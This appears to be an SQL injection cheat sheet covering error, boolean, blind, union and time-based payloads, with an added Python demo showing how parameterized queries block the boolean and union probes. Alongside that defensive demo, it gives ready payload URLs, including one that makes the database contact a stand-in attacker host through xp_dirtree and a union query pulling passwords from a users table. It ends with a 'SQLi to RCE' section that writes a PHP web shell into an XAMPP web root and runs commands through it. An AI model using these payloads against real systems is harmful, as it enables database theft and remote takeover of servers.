SQLi

SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements against the database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures.

Types

Error based

Forces the database to perform an operation that results in an error, then uses the content of the returned error message to extract data from the database.

Example

https://www.example.beaglesecurity.com/gallery.php?id=6'

Boolean based

Relies on sending an SQL query that forces the application to return a different result depending on whether the injected condition evaluates to TRUE or FALSE.

Example

https://www.example.beaglesecurity.com/gallery.php?id=6' AND 1=1 --+

Blind based

No query result is returned directly; payloads are sent and the web application's response and the resulting behaviour of the database server are observed instead.

Example

https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --

Union based

UNION-based attacks allow the tester to extract information from the database directly in the page output. Because the UNION operator can only be used if both queries have the same structure (the same number of columns), the attacker must craft a SELECT statement that matches the original query.

Example

https://example.com/products.aspx?id=1' UNION SELECT passwords from users;

Time based

Forces the database to wait for a specified number of seconds before responding. The response time tells the attacker whether the injected condition evaluated to TRUE or FALSE.

Example

https://example.com/products.aspx?id=1' and if(substring(user(),2,1)='a',SLEEP(5),1)--
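As an added example that is not part of the original page, the boolean- and union-based techniques above are run against a constructed in-memory SQLite table twice, once through string concatenation and once through a bound parameter, to show why parameterized queries are the fix: the same inputs return nothing once they can no longer reach the SQL parser. The table names, rows and the 'constructed-secret' value are made up for the demo.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the gallery.php?id= backend."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE gallery (id INTEGER PRIMARY KEY, title TEXT, public INTEGER);
        INSERT INTO gallery VALUES (6, 'public photo', 1);
        INSERT INTO gallery VALUES (7, 'private photo', 0);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return conn

def lookup_concat(conn, gallery_id):
    """Vulnerable: the id is pasted into the SQL text, so a quote in the
    value closes the literal and everything after it is parsed as SQL."""
    sql = f"SELECT title FROM gallery WHERE id = '{gallery_id}' AND public = 1"
    return sorted(row[0] for row in conn.execute(sql))

def lookup_param(conn, gallery_id):
    """Hardened: the value travels as a bound parameter, never as SQL text."""
    sql = "SELECT title FROM gallery WHERE id = ? AND public = 1"
    return sorted(row[0] for row in conn.execute(sql, (gallery_id,)))

# Probes in the shape of the page's examples; -- comments out the rest of
# the original query (SQLite accepts -- without the trailing +).
TRUE_PROBE = "6' AND 1=1 --"
FALSE_PROBE = "6' AND 1=2 --"
UNION_PROBE = "6' UNION SELECT password FROM users --"

def demo():
    conn = make_db()
    return {
        # Boolean-based: the concatenated query answers differently for a
        # true and a false condition; the parameterized one does not.
        "concat_true": lookup_concat(conn, TRUE_PROBE),
        "concat_false": lookup_concat(conn, FALSE_PROBE),
        "param_true": lookup_param(conn, TRUE_PROBE),
        "param_false": lookup_param(conn, FALSE_PROBE),
        # Union-based: the concatenated query leaks another table's column.
        "concat_union": lookup_concat(conn, UNION_PROBE),
        "param_union": lookup_param(conn, UNION_PROBE),
        # A legitimate id still works after the fix.
        "param_normal": lookup_param(conn, "6"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:13} {rows}")
```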

SQLi to RCE

Using XAMPP

Payload

# Inject cmd parameter
' union select 1,<php_payload>,3,4 into outfile <path> --
' union select 1,'<?php system($_GET["cmd"]); ?>',3,4 into outfile 'C:\\xampp\\htdocs\\rce.php' --

# Web shell written. Access from outside :
<host>/rce.php?cmd=<command>

# Test :
127.0.0.1/rce.php?cmd=time
# Result : The current time is: 16:22:25.20 Enter the new time: 3 4
